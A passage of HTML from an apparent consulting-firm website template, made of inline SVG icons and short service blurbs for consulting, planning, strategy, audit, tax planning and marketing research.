c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve beven a strategy thought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy tmhought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Оrganizational Audit</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
